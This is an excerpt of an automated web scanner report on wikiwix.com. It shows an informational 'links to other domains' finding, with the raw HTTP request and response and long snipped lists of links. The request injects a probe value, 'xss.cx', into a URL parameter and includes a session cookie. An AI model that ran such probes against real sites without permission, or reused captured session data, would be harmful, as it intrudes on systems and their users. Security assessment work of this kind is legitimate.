<li><a href="http://en.wikipedia.org/wiki/Category:Wikinode">Wikinode</a></li>
<li><a href="http://en.wikipedia.org/wiki/Category:Legal">Legal</a></li>
<li><a href="http://en.wikipedia.org/wiki/Category:Wikiversity_Essay_Contests">Wikiversity Essay Contests</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Law">Law</a></li>
<li><a href="http://en.wikipedia.org/wiki/Category:Papers">Papers</a></li>
<li><a href="http://en.wikipedia.org/wiki/Category:Computer_Architecture">Computer Architecture</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Uncategorized_pages">Uncategorized pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:How_to_use_R">How to use R</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Articles_to_be_merged">Articles to be merged</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Pages_moved_from_Wikibooks">Pages moved from Wikibooks</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Stubs">Stubs</a></li>
<li><a href="http://en.wikipedia.org/wiki/Category:Freshly_started_resources">Freshly started resources</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:HHF">HHF</a></li>
<li><a href="http://en.wikipedia.org/wiki/Category:Misc-Math-Topics-Help">Misc-Math-Topics-Help</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.xul.fr/en-xml-rss.html">Really Simple Syndication</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://validator.w3.org/feed/">feed validator</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.hackszine.com/blog/archive/2007/02/use_microsoft_office_excel_to.html"><i>
...[SNIP]...
<li>
<a class="extlinks" href="http://intelligentdesigns.net/blog/?p=57"> I hope that the wikisphere will encourage and drive original research ... not in Wikipedia itself, but in other spaces like Wikiversity and Wikinews. </a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.pmwiki.org/wiki/WikiSpheres/WikiSpheres">PmWiki: WikiSpheres / WikiSpheres</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.vanguardspheres.com/forums/herald/7096-new-maps-wikisphere-launches.html">Vangaurd Spheres: New maps and WikiSphere launches</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://home.comcast.net/~fbui/intel.html">home.comcast.net/~fbui/intel.html</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.atmel.com/dyn/resources/prod_documents/doc2467.pdf">Atmel Homepage</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.freescale.com/files/archives/doc/ref_manual/M68000PRM.pdf">Freescale Homepage</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://search.cpan.org/">CPAN Search</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.perlfoundation.org/perl5/">Perl 5 Wiki</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.perlfoundation.org/perl6/">Perl 6 Wiki</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://en.wikiversity.org/w/index.php?title=Computer_Architecture_Lab/Summer2006/PitterDeinhart/TCMP2.0&amp;action=edit">improve this article</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.nag.co.uk/numeric/RunderWindows.asp">Calling NAG Fortran Routines from R</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.stats.uwo.ca/faculty/murdoch/software/compilingDLLs/">Using external compilers with R</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.stats.uwo.ca/faculty/murdoch/software/compilingDLLs/fortran.html">Using Fortran with R in Windows</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://en.wikiversity.org/w/index.php?title=AIEEE_2009_Q001_equations&amp;action=edit">expanding it</a>
...[SNIP]...
<li><a href ='http://en.wikipedia.org/wiki/MySpace' target='_blank'> MySpace </a></li><li><a href ='http://en.wikipedia.org/wiki/Myspace' target='_blank'> Myspace </a></li><li><a href ='http://en.wikipedia.org/wiki/Cross-site scripting' target='_blank'> Cross-site scripting </a>
...[SNIP]...
<li><a href ='http://en.wikipedia.org/wiki/XSS 10' target='_blank'> XSS 10 </a></li><li><a href ='http://en.wikipedia.org/wiki/XSS' target='_blank'> XSS </a></li><li><a href ='http://en.wikipedia.org/wiki/XSS Worm' target='_blank'> XSS Worm </a></li><li><a href ='http://en.wikipedia.org/wiki/Samy (XSS)' target='_blank'> Samy (XSS) </a>
...[SNIP]...
<li><a href ='http://en.wikipedia.org/wiki/CX717' target='_blank'> CX717 </a></li><li><a href ='http://en.wikipedia.org/wiki/..' target='_blank'> .. </a></li><li><a href ='http://en.wikipedia.org/wiki/CX' target='_blank'> CX </a>
...[SNIP]...
<li><a href ='http://en.wiktionary.org/wiki/XSS' target='_blank'> XSS </a></li><li><a href ='http://en.wiktionary.org/wiki/www.siirpaylas.tr.cx' target='_blank'> www.siirpaylas.tr.cx </a>
...[SNIP]...
<li><a href ='http://en.wiktionary.org/wiki/CX' target='_blank'> CX </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/A Treatise on Electricity and Magnetism/Part II/Chapter V' target='_blank'> A Treatise on Electricity and Magnetis... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 5/Epistles - First Series/CX Mary' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The London Gazette 19345' target='_blank'> The London Gazette 19345 </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Mahabharata/Book 1: Adi Parva/Section CX' target='_blank'> The Mahabharata/Book 1: Adi Parva/Sect... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/Nicene and Post-Nicene Fathers: Series II/Volume XIV/Additional Canons 3/The Canons of Carthage/Canons/Canon CX' target='_blank'> Nicene and Post-Nicene Fathers: Series... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 6/Epistles - Second Series/CX Miss S. E. Waldo' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 8/Epistles - Fourth Series/CX Margo' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 9/Letters - Fifth Series/CX Badri Sah' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Records of the Federal Convention of 1787/Volume 3/Appendix A/CX' target='_blank'> The Records of the Federal Convention ... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/Of Human Bondage/Chapter CX' target='_blank'> Of Human Bondage/Chapter CX </a>
...[SNIP]...
<li><a href ='http://en.wikiquote.org/wiki/X me no Xs' target='_blank'> X me no Xs </a>
...[SNIP]...
<li><a href ='http://en.wikiquote.org/wiki/An X among Ys, a Y among Xs' target='_blank'> An X among Ys, a Y among Xs </a>
...[SNIP]...
<li><a href ='http://en.wikinews.org/wiki/Facebook down for upgrades; multiple blogs suggest site was hacked' target='_blank'> Facebook down for upgrades; multiple... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Tcl Programming/Print version' target='_blank'> Tcl Programming/Print version </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/X86 Assembly/Print Version' target='_blank'> X86 Assembly/Print Version </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/XML - Managing Data Exchange/SVG' target='_blank'> XML - Managing Data Exchange/SVG </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Cultural Anthropology/Social Stratification, Power and Conflict' target='_blank'> Cultural Anthropology/Social Stratific... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/The Unicyclopedia/Hardware' target='_blank'> The Unicyclopedia/Hardware </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Using Firefox/Print' target='_blank'> Using Firefox/Print </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Algebra/Systems of linear equations' target='_blank'> Algebra/Systems of linear equations </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Emerging Instructional Technology/Web 2.0' target='_blank'> Emerging Instructional Technology/Web ... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/LPI Linux Certification/LPIC1 Exam 101/GNU &amp; Unix Commands' target='_blank'> LPI Linux Certification/LPIC1 Exam 101... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/LPI Linux Certification/Process Text Streams Using Filters' target='_blank'> LPI Linux Certification/Process Text S... </a>
...[SNIP]...
<li><a href="http://www.okawix.com/" style="border:0;"><img src="images/download-okawix.png" style="margin-left:10%;"/>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikiversity.org/wiki/Web Design/XML challenges">Web Design/XML challenges</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikiversity.org/wiki/Wikisphere">Wikisphere</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikiversity.org/wiki/Computer Architecture Lab/Winter2006/PolzerJahn/ThreeMicroDiscussion">Computer Architecture Lab/Winter2006/PolzerJahn/ThreeMicroDiscussion</a>
...[SNIP]...
<h2><a href="http://www.sexpixbox.com/japandoll/sexy/gallary/marin_p.html">{lp..A_gtF`p_CX**u..**</a>
...[SNIP]...
<span><a href="http://www.sexpixbox.com/japandoll/sexy/gallary/marin_p.html">http://www.sexpixbox.com/japandoll/sexy/gallary/marin_p.html</a>
...[SNIP]...
<h2><a href="http://jobsnama.com/health/job-for-professional-group-exercisestrainers-cx-saudi-arabia">Job for Professional Group ExercisesTrainers (CX), Saudi Arabia | JobsNama</a>
...[SNIP]...
<span><a href="http://jobsnama.com/health/job-for-professional-group-exercisestrainers-cx-saudi-arabia">http://jobsnama.com/health/job-for-professional-group-exercisestrainers-cx-saudi-arabia</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikiversity.org/wiki/Topic:Perl">Topic:Perl</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikiversity.org/wiki/Computer Architecture Lab/Summer2006/PitterDeinhart/TCMP2.0">Computer Architecture Lab/Summer2006/PitterDeinhart/TCMP2.0</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikiversity.org/wiki/Anatomy of the heart">Anatomy of the heart</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikiversity.org/wiki/How to use R/Tutorials/Connecting Fortran and R">How to use R/Tutorials/Connecting Fortran and R</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikiversity.org/wiki/Basic cardiac anatomy">Basic cardiac anatomy</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikiversity.org/wiki/AIEEE 2009 Q001 equations">AIEEE 2009 Q001 equations</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikiversity.org/wiki/Linux/linux-0.01.tar/boot/boot.s">Linux/linux-0.01.tar/boot/boot.s</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Law" target="_blanck">Law</a></li><li><a href="http://en.wikipedia.org/wiki/Category:Legal" target="_blanck">Legal</a></li><li><a href="http://en.wikipedia.org/wiki/Category:Wikinode" target="_blanck">Wikinode</a></li><li><a href="http://en.wikipedia.org/wiki/Category:Wikisphere" target="_blanck">Wikisphere</a></li><li><a href="http://en.wikipedia.org/wiki/Category:Wikisphere" target="_blanck">Wikisphere</a></li><li><a href="http://en.wikipedia.org/wiki/Category:Wikiversity_Essay_Contests" target="_blanck">Wikiversity Essay Contests</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Education" target="_blanck">Education</a></li><li><a href="http://en.wikipedia.org/wiki/Portal:Learning_Projects" target="_blanck">Learning Projects</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Learning_Projects" target="_blanck">Learning Projects</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Learning_Projects" target="_blanck">Learning Projects</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Computer_Architecture" target="_blanck">Computer Architecture</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Papers" target="_blanck">Papers</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Engineering_and_Technology" target="_blanck">Engineering and Technology</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Computer_Architecture" target="_blanck">Computer Architecture</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Uncategorized_pages" target="_blanck">Uncategorized pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:How_to_use_R" target="_blanck">How to use R</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Articles_to_be_merged" target="_blanck">Articles to be merged</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Pages_moved_from_Wikibooks" target="_blanck">Pages moved from Wikibooks</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Freshly_started_resources" target="_blanck">Freshly started resources</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:HHF" target="_blanck">HHF</a></li><li><a href="http://en.wikipedia.org/wiki/Category:Misc-Math-Topics-Help" target="_blanck">Misc-Math-Topics-Help</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Stubs" target="_blanck">Stubs</a>
...[SNIP]...
<p>This project is developed by Linterweb, with the financial support of <a href="http://www.oseo.fr/"><img src="images/oseo.gif" style="width:100px;padding-left:5px;position:relative;top:10px;" alt="OSEO"></a>. It is hosted by the <a href="http://www.crihan.fr/">CRIHAN</a>
...[SNIP]...

3.3. http://wikiwix.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?art=true&action=xss.cx&lang=en&disp=article HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/?art=true&action=&lang=en
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:53:17 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Length: 46451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta http
...[SNIP]...
</script><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><a href="http://www.okawix.com" class="wikiondvd" title="Okawix, offline reader"></a><a href="http://en.wikiactu.com/" class="wikiactu" title="Wikinews blog"></a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Los_Angeles">Los Angeles</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Companies">Companies</a></li>
<li><a href="http://en.wikipedia.org/wiki/Portal:Greater_Los_Angeles">Greater Los Angeles</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Internet">Internet</a></li>
<li><a href="http://en.wikipedia.org/wiki/Portal:Software_Testing">Software Testing</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Computer_security">Computer security</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Esperanto">Esperanto</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Types_of_companies">Types of companies</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Disambiguation_pages">Disambiguation pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:All_article_disambiguation_pages">All article disambiguation pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:All_disambiguation_pages">All disambiguation pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Esperanto_publications">Esperanto publications</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.myspace.com/">Myspace Global</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://au.myspace.com/">Myspace Australia</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://br.myspace.com/">Myspace Brazil</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://xsser.sf.net">XSSer: automatic -framework- to detect, exploit and report XSS vulnerabilities</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://bugtraq.totalh.com">BUGTRAQ-VULNERABLE SITE TRACKER</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.whitehatsec.com/home/assets/WPStatsreport_100107.pdf">WhiteHat Security Vulnerabilties White Paper</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.boeing.com/defense-space/space/xss/index.htm">XSS Micro-Satellite</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://nssdc.gsfc.nasa.gov/nmc/masterCatalog.do?sc=2003-005B">2003-005B</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.space.com/missionlaunches/xss10_update_030130.html"> Air Force XSS-10 Micro-Satellite Mission a Success </a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.bindshell.net/papers/xssv/"> The Cross-site Scripting Virus </a>
...[SNIP]...
<li>
<a class="extlinks" href="http://seclists.org/bugtraq/2002/Oct/119"> XSS bug in hotmail login page </a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.techspot.com/news/24226-myspace-speaks-about-samy-kamkars-sentencing.html"> Myspace Speaks about Samy Kamkar's Sentencing </a>
...[SNIP]...
<li>
<a class="extlinks" href="http://blog.outer-court.com/archive/2005-10-14-n81.html">An interview with Samy</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://it.slashdot.org/it/05/10/14/126233.shtml?tid=172&amp;tid=95&amp;tid=220">slashdot.org discussion</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.sophos.com/virusinfo/analyses/jsspaceheroa.html"> JS/Spacehero-A, Sophos threat analysis </a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.patentstorm.us/patents/6110935-description.html"> Benzofurazan compounds for enhancing glutamatergic synaptic responses </a>
...[SNIP]...
<li>
<a class="extlinks" href="http://dx.doi.org/10.1007%2Fs00213-008-1360-z">10.1007/s00213-008-1360-z</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://www.ncbi.nlm.nih.gov/pubmed/18985324">18985324</a>
...[SNIP]...
<li>
<a class="extlinks" href="http://acronyms.thefreedictionary.com/CX">CX Acronym List</a>
...[SNIP]...
<li><a href ='http://en.wiktionary.org/wiki/XSS' target='_blank'> XSS </a></li><li><a href ='http://en.wiktionary.org/wiki/www.siirpaylas.tr.cx' target='_blank'> www.siirpaylas.tr.cx </a>
...[SNIP]...
<li><a href ='http://en.wiktionary.org/wiki/CX' target='_blank'> CX </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/A Treatise on Electricity and Magnetism/Part II/Chapter V' target='_blank'> A Treatise on Electricity and Magnetis... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 5/Epistles - First Series/CX Mary' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The London Gazette 19345' target='_blank'> The London Gazette 19345 </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Mahabharata/Book 1: Adi Parva/Section CX' target='_blank'> The Mahabharata/Book 1: Adi Parva/Sect... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/Nicene and Post-Nicene Fathers: Series II/Volume XIV/Additional Canons 3/The Canons of Carthage/Canons/Canon CX' target='_blank'> Nicene and Post-Nicene Fathers: Series... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 6/Epistles - Second Series/CX Miss S. E. Waldo' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 8/Epistles - Fourth Series/CX Margo' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 9/Letters - Fifth Series/CX Badri Sah' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Records of the Federal Convention of 1787/Volume 3/Appendix A/CX' target='_blank'> The Records of the Federal Convention ... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/Of Human Bondage/Chapter CX' target='_blank'> Of Human Bondage/Chapter CX </a>
...[SNIP]...
<li><a href ='http://en.wikiquote.org/wiki/X me no Xs' target='_blank'> X me no Xs </a>
...[SNIP]...
<li><a href ='http://en.wikiquote.org/wiki/An X among Ys, a Y among Xs' target='_blank'> An X among Ys, a Y among Xs </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Web Design/XML challenges' target='_blank'> Web Design/XML challenges </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Wikisphere' target='_blank'> Wikisphere </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Computer Architecture Lab/Winter2006/PolzerJahn/ThreeMicroDiscussion' target='_blank'> Computer Architecture Lab/Winter2006/P... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Topic:Perl' target='_blank'> Topic:Perl </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Computer Architecture Lab/Summer2006/PitterDeinhart/TCMP2.0' target='_blank'> Computer Architecture Lab/Summer2006/P... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Anatomy of the heart' target='_blank'> Anatomy of the heart </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/How to use R/Tutorials/Connecting Fortran and R' target='_blank'> How to use R/Tutorials/Connecting Fort... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Basic cardiac anatomy' target='_blank'> Basic cardiac anatomy </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/AIEEE 2009 Q001 equations' target='_blank'> AIEEE 2009 Q001 equations </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Linux/linux-0.01.tar/boot/boot.s' target='_blank'> Linux/linux-0.01.tar/boot/boot.s </a>
...[SNIP]...
<li><a href ='http://en.wikinews.org/wiki/Facebook down for upgrades; multiple blogs suggest site was hacked' target='_blank'> Facebook down for upgrades; multiple... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Tcl Programming/Print version' target='_blank'> Tcl Programming/Print version </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/X86 Assembly/Print Version' target='_blank'> X86 Assembly/Print Version </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/XML - Managing Data Exchange/SVG' target='_blank'> XML - Managing Data Exchange/SVG </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Cultural Anthropology/Social Stratification, Power and Conflict' target='_blank'> Cultural Anthropology/Social Stratific... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/The Unicyclopedia/Hardware' target='_blank'> The Unicyclopedia/Hardware </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Using Firefox/Print' target='_blank'> Using Firefox/Print </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Algebra/Systems of linear equations' target='_blank'> Algebra/Systems of linear equations </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Emerging Instructional Technology/Web 2.0' target='_blank'> Emerging Instructional Technology/Web ... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/LPI Linux Certification/LPIC1 Exam 101/GNU &amp; Unix Commands' target='_blank'> LPI Linux Certification/LPIC1 Exam 101... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/LPI Linux Certification/Process Text Streams Using Filters' target='_blank'> LPI Linux Certification/Process Text S... </a>
...[SNIP]...
<li><a href="http://www.okawix.com/" style="border:0;"><img src="images/download-okawix.png" style="margin-left:10%;"/>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/MySpace">MySpace</a>
...[SNIP]...
<div class="img-box"><a href="http://en.wikipedia.org/wiki/Image:Foxinteractivemediaheadquarters.jpg"><img src="http://img.wikiwix.com/img.php?imgtitle=Foxinteractivemediaheadquarters.jpg&amp;width=56x56&amp;lang=en" alt="Foxinteractivemediaheadquarters" border="0" width="56" height="56" title="click t
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/Myspace">Myspace</a>
...[SNIP]...
<div class="img-box"><a href="http://en.wikipedia.org/wiki/Image:Foxinteractivemediaheadquarters.jpg"><img src="http://img.wikiwix.com/img.php?imgtitle=Foxinteractivemediaheadquarters.jpg&amp;width=56x56&amp;lang=en" alt="Foxinteractivemediaheadquarters" border="0" width="56" height="56" title="click t
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/Cross-site scripting">Cross-site scripting</a>
...[SNIP]...
<h2><a href="http://www.sexpixbox.com/japandoll/sexy/gallary/marin_p.html">{lp..A_gtF`p_CX**u..**</a>
...[SNIP]...
<span><a href="http://www.sexpixbox.com/japandoll/sexy/gallary/marin_p.html">http://www.sexpixbox.com/japandoll/sexy/gallary/marin_p.html</a>
...[SNIP]...
<h2><a href="http://jobsnama.com/health/job-for-professional-group-exercisestrainers-cx-saudi-arabia">Job for Professional Group ExercisesTrainers (CX), Saudi Arabia | JobsNama</a>
...[SNIP]...
<span><a href="http://jobsnama.com/health/job-for-professional-group-exercisestrainers-cx-saudi-arabia">http://jobsnama.com/health/job-for-professional-group-exercisestrainers-cx-saudi-arabia</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/XSS 10">XSS 10</a>
...[SNIP]...
<div class="img-box"><a href="http://en.wikipedia.org/wiki/Image:Delta-II_Stage2_XSS-10.jpg"><img src="http://img.wikiwix.com/img.php?imgtitle=Delta-II_Stage2_XSS-10.jpg&amp;width=56x56&amp;lang=en" alt="Delta-II_Stage2_XSS-10" border="0" width="56" height="56" title="click to enlarge that pic
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/XSS">XSS</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/XSS Worm">XSS Worm</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/Samy (XSS)">Samy (XSS)</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/CX717">CX717</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/..">..</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wikipedia.org/wiki/CX">CX</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Types_of_companies" target="_blanck">Types of companies</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Companies" target="_blanck">Companies</a></li><li><a href="http://en.wikipedia.org/wiki/Portal:Los_Angeles" target="_blanck">Los Angeles</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Types_of_companies" target="_blanck">Types of companies</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Companies" target="_blanck">Companies</a></li><li><a href="http://en.wikipedia.org/wiki/Portal:Greater_Los_Angeles" target="_blanck">Greater Los Angeles</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Internet" target="_blanck">Internet</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Software_Testing" target="_blanck">Software Testing</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:All_article_disambiguation_pages" target="_blanck">All article disambiguation pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:All_disambiguation_pages" target="_blanck">All disambiguation pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Disambiguation_pages" target="_blanck">Disambiguation pages</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Computer_security" target="_blanck">Computer security</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Computer_security" target="_blanck">Computer security</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Category:Esperanto_publications" target="_blanck">Esperanto publications</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/Portal:Esperanto" target="_blanck">Esperanto</a>
...[SNIP]...
